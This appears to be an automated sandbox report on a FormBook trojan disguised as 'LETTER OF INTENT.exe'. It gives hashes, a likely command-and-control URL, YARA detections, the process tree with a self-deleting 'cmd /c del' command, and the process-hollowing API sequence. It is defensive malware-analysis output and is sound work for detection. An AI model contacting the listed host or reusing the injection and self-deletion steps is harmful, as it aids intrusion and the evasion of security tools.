            1.0.LETTER OF INTENT.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            1.2.LETTER OF INTENT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            1.0.LETTER OF INTENT.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            1.0.LETTER OF INTENT.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            No Antivirus matches
            Source | Detection | Scanner | Label
            www.czzhudi.com/uar3/ | 2% | Virustotal |
            www.czzhudi.com/uar3/ | 0% | Avira URL Cloud | safe
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            www.czzhudi.com/uar3/ | true | 2%, Virustotal; Avira URL Cloud: safe | low
            IP
            192.168.2.1
            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:574776
            Start date:18.02.2022
            Start time:16:18:08
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 16s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:LETTER OF INTENT.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@9/2@0/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 64.5% (good quality ratio 57.8%)
            • Quality average: 69.8%
            • Quality standard deviation: 32.8%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 117
            • Number of non-executed functions: 135
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            16:19:01 | API Interceptor | 1x Sleep call for process: LETTER OF INTENT.exe modified
            16:20:11 | API Interceptor | 316x Sleep call for process: explorer.exe modified
            No context
            Process:C:\Users\user\Desktop\LETTER OF INTENT.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1873
            Entropy (8bit):5.355036985457214
            Encrypted:false
            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHxvj:iqXeqm00YqhQnouRqjntIxHeqzTwRb
            MD5:3EA795204F0AE6DF0CC6499311A7BD85
            SHA1:95E0DB4B438485204891236BFF9F1FDE6686E995
            SHA-256:361C4FA9B912A516418473EB73389D4CA002A2BAEA39B4492DB37A3FA1A0B2CF
            SHA-512:9C8D1ECCC3F5981EDD1AA6330BA048E94A86501EFE79B2153E17EA053586F4CC4B0D3FC755EE4B1237DC7E8ED91C842DD36D8CFA14263B02FE1E1A67CBE9CEC6
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
            Process:C:\Windows\explorer.exe
            File Type:data
            Category:modified
            Size (bytes):29232
            Entropy (8bit):1.7250284876731006
            Encrypted:false
            SSDEEP:48:VSAM7sKRXki4j61DijgQ1MMDSYzhzoapfkf3RPnwYV1vHL65LNYtMKfu8q+9KFcI:497Haj6g1jDSbaqlbVUzsBu8nIceKq
            MD5:EA7C836B2E6E62AC35AEE21C3A23DA34
            SHA1:F1204AE84F109D1B4BF13966F9543E5455C1A112
            SHA-256:EFCB951BC2060B075AD876E909CFB852EA6BC0D17F57C7BDCA515D2EF66CD7D2
            SHA-512:58C77E0D6C1D9DCE906F16249796A07D355BE28E86577D2EBC550769307A727D5B990ACEC9CD469F0DE48DE5E5844452905E92ADF7DF7C846F707B43306A14F1
            Malicious:false
            Reputation:low
            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.631609505964498
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Generic Win/DOS Executable (2004/3) 0.01%
            File name:LETTER OF INTENT.exe
            File size:768512
            MD5:b3f43a58149d9058f8c39455869c2f84
            SHA1:8f3d20b2f71e7331c355e2926a5fc5ce71e72eb8
            SHA256:a04a4acf00f50f8b3c3bea38914813aa75ce4ba8c30c08971a6094c492d0d41d
            SHA512:4aa74fa83551e3c2318f488cf2dbd0741e9b42899ad8501c0bf9d0e2c6471fee6ad0c1588ea652195de1ef813e51bc2bb03628cf5609792e7e59e1baa56b3fef
            SSDEEP:12288:m5VkoeQ0t3NDoFiXtXZY3ipV/SykcDw0sK7kcunGudQtcuMx:1ND7pY3iX/fvD317xu5QtvW
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..b..............0.............~.... ........@.. ....................... ............@................................
            Icon Hash:00828e8e8686b000
            Entrypoint:0x4bc87e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x620F9B2F [Fri Feb 18 13:12:15 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:v4.0.30319
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            xchg eax, esi
            xor byte ptr [edi], al
            jnbe 00007F5B9CA6FB4Eh
            popad
            push cs
            out dx, al
            mov edx, 19990951h
            les ebp, fword ptr [ebp+07h]

            Name                                  Virtual Address  Virtual Size  Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
            IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc82c          0x4f          .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbe000          0x630         .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc0000          0xc           .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
            .text   0x2000           0xbac8c       0xbae00   False     0.864288513796   data       7.64198906691   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rsrc   0xbe000          0x630         0x800     False     0.33740234375    data       3.46913951929   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc  0xc0000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Name         RVA      Size   Type                                                                          Language  Country
            RT_VERSION   0xbe090  0x3a0  data
            RT_MANIFEST  0xbe440  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

            DLL          Import
            mscoree.dll  _CorExeMain

            Description       Data
            Translation       0x0000 0x04b0
            LegalCopyright    DeltaEngine 2012
            Assembly Version  1.0.0.0
            InternalName      ConsoleSpecial.exe
            FileVersion       1.0.0.0
            CompanyName       DeltaEngine
            LegalTrademarks
            Comments
            ProductName       BlogEngineSpamCommentRemover
            ProductVersion    1.0.0.0
            FileDescription   BlogEngine Spam Comment Remover
            OriginalFilename  ConsoleSpecial.exe

            No network behavior found

            Target ID:0
            Start time:16:19:00
            Start date:18/02/2022
            Path:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Imagebase:0xfd0000
            File size:768512 bytes
            MD5 hash:B3F43A58149D9058F8C39455869C2F84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            Target ID:1
            Start time:16:19:03
            Start date:18/02/2022
            Path:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Imagebase:0x670000
            File size:768512 bytes
            MD5 hash:B3F43A58149D9058F8C39455869C2F84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            Target ID:3
            Start time:16:19:07
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            Target ID:15
            Start time:16:19:29
            Start date:18/02/2022
            Path:C:\Windows\SysWOW64\ipconfig.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\ipconfig.exe
            Imagebase:0x2c0000
            File size:29184 bytes
            MD5 hash:B0C7423D02A007461C850CD0DFE09318
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:moderate

            Target ID:16
            Start time:16:19:35
            Start date:18/02/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Imagebase:0x150000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:17
            Start time:16:19:37
            Start date:18/02/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7ecfc0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:23
            Start time:16:20:10
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:36
            Start time:16:21:03
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

              Execution Graph

              Execution Coverage:6.8%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:18
              Total number of Limit Nodes:0
              execution_graph 15116 61c71d8 15117 61c7220 WriteProcessMemory 15116->15117 15119 61c7277 15117->15119 15124 61c72f8 15125 61c7343 ReadProcessMemory 15124->15125 15127 61c7387 15125->15127 15136 61c70e8 15137 61c7128 VirtualAllocEx 15136->15137 15139 61c7165 15137->15139 15120 61c6f50 15121 61c6f95 SetThreadContext 15120->15121 15123 61c6fdd 15121->15123 15128 61c74f0 15129 61c7579 CreateProcessA 15128->15129 15131 61c773b 15129->15131 15132 61c6e70 15133 61c6eb0 ResumeThread 15132->15133 15135 61c6ee1 15133->15135

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 442 1926810-1926832 443 1926834 442->443 444 1926839-19268b6 call 192514c 442->444 443->444 448 192692a-192693d 444->448 449 1926943-1926959 448->449 450 19268b8-19268bf 448->450 456 1926963-1926997 449->456 451 1926911-1926924 450->451 452 19268c1-19268eb call 192515c 451->452 453 1926926-1926927 451->453 461 19268f3-192690e 452->461 453->448 461->451
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b085c9a8300b02f3ff0f2c1aa2037bcdf680574ba4d98a0864defd99ec9603c3
              • Instruction ID: feca33cc89858d024984335e66de9b71b92307a5f6e611d1871a51facb781c98
              • Opcode Fuzzy Hash: b085c9a8300b02f3ff0f2c1aa2037bcdf680574ba4d98a0864defd99ec9603c3
              • Instruction Fuzzy Hash: CB519375D052299FDF04CFEAC844AEEFBB2BF89300F148429D919AB258DB745946CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 463 1926d58-1926d7d 464 1926d84-1926ddd 463->464 465 1926d7f 463->465 468 1926de4-1926e18 464->468 469 1926ddf 464->469 465->464 471 1926ea1-1926eba 468->471 469->468 472 1926ec0-1926ec7 471->472 473 1926e1d-1926e27 471->473 478 1926ecf-1926ee2 472->478 474 1926e29 473->474 475 1926e2e-1926e3f 473->475 474->475 476 1926e41 475->476 477 1926e46-1926e59 475->477 476->477 479 1926e60-1926e90 477->479 480 1926e5b 477->480 483 1926e92-1926e98 479->483 484 1926e9a 479->484 480->479 485 1926e9d-1926e9e 483->485 484->485 485->471
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1f57d8645a6146e2b8e79e2ce29a4c8e5198ebcb632ee65898e500e72530f314
              • Instruction ID: e90c473baf27e38c011935482925ea2e0efb86633d45325cf890f286d72d1f43
              • Opcode Fuzzy Hash: 1f57d8645a6146e2b8e79e2ce29a4c8e5198ebcb632ee65898e500e72530f314
              • Instruction Fuzzy Hash: FA51C474E012299FCB04DFAAD9849EEFBF2BF88310F18C565E409A7255D730A941CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 06e82f51f7ffa6dc8e6c02cb1aa8a2a20d4badae03f3a2073d6832aecaeb9fce
              • Instruction ID: c5ae192575fe726374cb88aa7456f8fce6435a7d5359b7996166e73dd8eaa347
              • Opcode Fuzzy Hash: 06e82f51f7ffa6dc8e6c02cb1aa8a2a20d4badae03f3a2073d6832aecaeb9fce
              • Instruction Fuzzy Hash: 344193B5E012198FDB08CFAAC9446AEBBF2BF89300F14C42AD518AB258DB345946CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 61c74f0-61c7585 2 61c75be-61c75de 0->2 3 61c7587-61c7591 0->3 10 61c7617-61c7646 2->10 11 61c75e0-61c75ea 2->11 3->2 4 61c7593-61c7595 3->4 5 61c75b8-61c75bb 4->5 6 61c7597-61c75a1 4->6 5->2 8 61c75a5-61c75b4 6->8 9 61c75a3 6->9 8->8 12 61c75b6 8->12 9->8 17 61c767f-61c7739 CreateProcessA 10->17 18 61c7648-61c7652 10->18 11->10 13 61c75ec-61c75ee 11->13 12->5 15 61c75f0-61c75fa 13->15 16 61c7611-61c7614 13->16 19 61c75fc 15->19 20 61c75fe-61c760d 15->20 16->10 31 61c773b-61c7741 17->31 32 61c7742-61c77c8 17->32 18->17 21 61c7654-61c7656 18->21 19->20 20->20 22 61c760f 20->22 23 61c7658-61c7662 21->23 24 61c7679-61c767c 21->24 22->16 26 61c7664 23->26 27 61c7666-61c7675 23->27 24->17 26->27 27->27 28 61c7677 27->28 28->24 31->32 42 61c77d8-61c77dc 32->42 43 61c77ca-61c77ce 32->43 45 61c77ec-61c77f0 42->45 46 61c77de-61c77e2 42->46 43->42 44 61c77d0 43->44 44->42 48 61c7800-61c7804 45->48 49 61c77f2-61c77f6 45->49 46->45 47 61c77e4 46->47 47->45 50 61c7816-61c781d 48->50 51 61c7806-61c780c 48->51 49->48 52 61c77f8 49->52 53 61c781f-61c782e 50->53 54 61c7834 50->54 51->50 52->48 53->54
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C7726
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 8062e2d03806d866bd6043ae46acb255fb0e9fa68b7523b4841d8eaa6e4d78ae
              • Instruction ID: b64087ca3091f26c6627fe345d140edf170482decbf44bddc3db14b1f994a995
              • Opcode Fuzzy Hash: 8062e2d03806d866bd6043ae46acb255fb0e9fa68b7523b4841d8eaa6e4d78ae
              • Instruction Fuzzy Hash: 01916C71D00629CFEB50CFA8C845BEDBBB6BF58324F048569D819A7280DB749985CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 56 61c71d8-61c7226 58 61c7228-61c7234 56->58 59 61c7236-61c7275 WriteProcessMemory 56->59 58->59 61 61c727e-61c72ae 59->61 62 61c7277-61c727d 59->62 62->61
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C7268
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: fbe490c08e02fbf6a2ce0fdf86dc4f85244035c3a2717b79b9eb684ca248713d
              • Instruction ID: 8681485b65d62dda0da9437c660a935b19bd1ea00bbeeeb1a977832f5a7131b5
              • Opcode Fuzzy Hash: fbe490c08e02fbf6a2ce0fdf86dc4f85244035c3a2717b79b9eb684ca248713d
              • Instruction Fuzzy Hash: 672115719003599FCB50CFA9C984BEEBBF5FF48324F54882AE919A7240D7789954CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 76 61c72f8-61c7385 ReadProcessMemory 79 61c738e-61c73be 76->79 80 61c7387-61c738d 76->80 80->79
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C7378
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 1e09708c6b47e547b0d01c600124102a314969eefbd284c29f1f5ed5a11e7bb5
              • Instruction ID: aef17e3c6d24f9eb1f2485e9e24e6b46c06d922415ae5dc3a222cf57301c1d1f
              • Opcode Fuzzy Hash: 1e09708c6b47e547b0d01c600124102a314969eefbd284c29f1f5ed5a11e7bb5
              • Instruction Fuzzy Hash: 1D2116718006599FCB00CFA9C984BEEBBF5FF48324F54882EE919A7240D7749944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 66 61c6f50-61c6f9b 68 61c6f9d-61c6fa9 66->68 69 61c6fab-61c6fdb SetThreadContext 66->69 68->69 71 61c6fdd-61c6fe3 69->71 72 61c6fe4-61c7014 69->72 71->72
              APIs
